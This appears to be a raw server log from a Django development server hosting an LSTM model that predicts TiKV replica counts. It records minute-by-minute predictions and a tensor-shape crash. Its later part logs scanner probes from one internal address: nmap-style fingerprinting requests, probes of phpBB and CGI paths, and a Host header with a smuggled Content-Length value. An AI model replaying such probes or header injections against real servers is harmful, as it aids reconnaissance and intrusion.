nohup: ignoring input
/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
  _np_qint8 = np.dtype([("qint8", np.int8, 1)])
/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
  _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:521: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
  _np_qint16 = np.dtype([("qint16", np.int16, 1)])
/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:522: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
  _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:523: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
  _np_qint32 = np.dtype([("qint32", np.int32, 1)])
/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:528: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
  np_resource = np.dtype([("resource", np.ubyte, 1)])
Performing system checks...

System check identified no issues (0 silenced).
September 13, 2020 - 09:41:25
Django version 3.0.6, using settings 'test_server.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
statement_ops len:  1200
statement_ops len:  1200
len(data_train):  540
train_x.shape (521, 15, 1)
train_y.shape (521, 1)
/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/tensorflow/python/ops/gradients_impl.py:100: UserWarning: Converting sparse IndexedSlices to a dense Tensor of unknown shape. This may consume a large amount of memory.
  "Converting sparse IndexedSlices to a dense Tensor of unknown shape. "
2020-09-13 09:41:28.202200: I tensorflow/core/platform/cpu_feature_guard.cc:140] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA
Model restored...
[13/Sep/2020 09:41:31] "GET /tikv_replicas HTTP/1.1" 200 85
test_predict.shape: (5,)
test_y: (1,)
第 0 分钟的预测: 5
[13/Sep/2020 09:41:39] "GET /tikv_replicas HTTP/1.1" 200 85
[13/Sep/2020 09:41:41] "GET /tikv_replicas HTTP/1.1" 200 85
test_predict.shape: (5,)
test_y: (1,)
第 1 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 2 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 3 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 4 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 5 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 6 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 7 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 8 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 9 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 10 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 11 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 12 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 13 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 14 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 15 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 16 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 17 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 18 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 19 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 20 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 21 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 22 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 23 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 24 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 25 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 26 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 27 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 28 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 29 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 30 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 31 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 32 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 33 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 34 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 35 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 36 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 37 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 38 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 39 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 40 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 41 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 42 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 43 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 44 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 45 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 46 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 47 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 48 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 49 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 50 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 51 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 52 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 53 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 54 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 55 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 56 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 57 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 58 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 59 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 60 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 61 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 62 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 63 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 64 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 65 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 66 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 67 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 68 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 69 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 70 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 71 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 72 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 73 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 74 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 75 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 76 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 77 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 78 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 79 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 80 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 81 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 82 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 83 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 84 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 85 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 86 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 87 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 88 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 89 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 90 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 91 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 92 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 93 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 94 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 95 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 96 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 97 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 98 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 99 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 100 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 101 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 102 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 103 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 104 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 105 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 106 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 107 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 108 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 109 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 110 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 111 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 112 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 113 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 114 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 115 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 116 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 117 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 118 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 119 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 120 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 121 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 122 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 123 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 124 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 125 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 126 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 127 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 128 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 129 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 130 分钟的预测: 5
test_predict.shape: (5,)
test_y: (1,)
第 131 分钟的预测: 3
test_predict.shape: (5,)
test_y: (1,)
第 132 分钟的预测: 5
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/threading.py", line 864, in run
    self._target(*self._args, **self._kwargs)
  File "/data2/hust_tmp/twhust/test_server/test_server/test_server/train.py", line 441, in start
    train_lstm(statement_ops, train_begin, train_end, refer_data, predict_duration, init_tikv_replicas)
  File "/data2/hust_tmp/twhust/test_server/test_server/test_server/train.py", line 377, in train_lstm
    prob = sess.run(pred, feed_dict={X: [test_x[step]], keep_prob: kp})
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/tensorflow/python/client/session.py", line 900, in run
    run_metadata_ptr)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/tensorflow/python/client/session.py", line 1111, in _run
    str(subfeed_t.get_shape())))
ValueError: Cannot feed value of shape (1, 14, 1) for Tensor 'Placeholder:0', which has shape '(?, 15, 1)'

----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 40346)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 09:59:49] "GET / HTTP/1.0" 404 2154
Not Found: /
[07/Nov/2020 09:59:49] "GET / HTTP/1.0" 404 2154
Not Found: /nice ports,/Trinity.txt.bak
[07/Nov/2020 09:59:49] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 2255
[07/Nov/2020 09:59:49] code 400, message Bad request syntax ('\x05\x04\x00\x01\x02\x80\x05\x01\x00\x03')
[07/Nov/2020 09:59:49] "  " 400 -
Not Found: /
[07/Nov/2020 09:59:49] "OPTIONS / HTTP/1.0" 404 2158
[07/Nov/2020 09:59:50] code 400, message Bad request version ('RTSP/1.0')
[07/Nov/2020 09:59:50] "OPTIONS / RTSP/1.0" 400 -
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 39776)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 52826)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 10:00:02] code 400, message Bad request syntax ('HELP')
[07/Nov/2020 10:00:02] "HELP" 400 -
[07/Nov/2020 10:00:02] code 400, message Bad request syntax ('\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G×÷º,îê²`~ó\x00ý\x82{¹Õ\x96Èw\x9bæÄÛ<=Ûoï\x10n\x00\x00(\x00\x16\x00\x13\x00')
[07/Nov/2020 10:00:02] You're accessing the development server over HTTPS, but it only supports HTTP.

----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 48208)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 10:00:08] code 400, message Bad request syntax ('\x01default')
[07/Nov/2020 10:00:08] "default" 400 -
[07/Nov/2020 10:00:08] code 400, message Bad request version ('SIP/2.0')
[07/Nov/2020 10:00:08] "OPTIONS sip:nm SIP/2.0" 400 -
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 32868)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 10:00:13] "GET /?CAVIT HTTP/1.1" 404 2160
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 41952)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 33874)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 10:14:12] "GET / HTTP/1.0" 404 2154
Not Found: /
[07/Nov/2020 10:14:12] "GET / HTTP/1.0" 404 2154
Not Found: /nice ports,/Trinity.txt.bak
[07/Nov/2020 10:14:12] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 2255
[07/Nov/2020 10:14:12] code 400, message Bad request syntax ('\x05\x04\x00\x01\x02\x80\x05\x01\x00\x03')
[07/Nov/2020 10:14:12] "  " 400 -
Not Found: /
[07/Nov/2020 10:14:12] "OPTIONS / HTTP/1.0" 404 2158
[07/Nov/2020 10:14:13] code 400, message Bad request version ('RTSP/1.0')
[07/Nov/2020 10:14:13] "OPTIONS / RTSP/1.0" 400 -
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 57498)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 45008)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 10:14:23] code 400, message Bad request syntax ('HELP')
[07/Nov/2020 10:14:23] "HELP" 400 -
[07/Nov/2020 10:14:23] code 400, message Bad request syntax ('\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G×÷º,îê²`~ó\x00ý\x82{¹Õ\x96Èw\x9bæÄÛ<=Ûoï\x10n\x00\x00(\x00\x16\x00\x13\x00')
[07/Nov/2020 10:14:23] You're accessing the development server over HTTPS, but it only supports HTTP.

----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 58982)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 10:14:28] code 400, message Bad request syntax ('\x01default')
[07/Nov/2020 10:14:28] "default" 400 -
[07/Nov/2020 10:14:28] code 400, message Bad request version ('SIP/2.0')
[07/Nov/2020 10:14:28] "OPTIONS sip:nm SIP/2.0" 400 -
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 60118)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 10:14:33] "GET /?CAVIT HTTP/1.1" 404 2160
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 60744)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 10:14:50] code 400, message Bad request version ('&\x95§¸÷¨\x1aCðÂ\x00\x00|À,À0À+À/Ì©Ì¨\x00£\x00\x9f\x00¢\x00\x9eÌªÀ¯À\xadÀ$À(À')
[07/Nov/2020 10:14:50] You're accessing the development server over HTTPS, but it only supports HTTP.

Not Found: /
[07/Nov/2020 10:14:54] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 10:14:55] "GET / HTTP/1.1" 404 2149
Not Found: /chassis/config/GeneralChassisConfig.html
[07/Nov/2020 10:14:55] "GET /chassis/config/GeneralChassisConfig.html HTTP/1.1" 404 2287
Not Found: /
[07/Nov/2020 10:14:55] "GET / HTTP/1.0" 404 2154
Not Found: /
[07/Nov/2020 10:14:55] "GET /" 404 2154
Not Found: /
[07/Nov/2020 10:14:56] "HEAD / HTTP/1.1" 404 2150
Not Found: /cgi-bin/Web_store/web_store.cgi
[07/Nov/2020 10:14:56] "POST /cgi-bin/Web_store/web_store.cgi HTTP/1.0" 404 2261
Not Found: /phpBB/index.php
[07/Nov/2020 10:14:56] "GET /phpBB/index.php HTTP/1.0" 404 2212
Invalid HTTP_HOST header: '172.16.4.4Content-Length: 49'. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /perl/
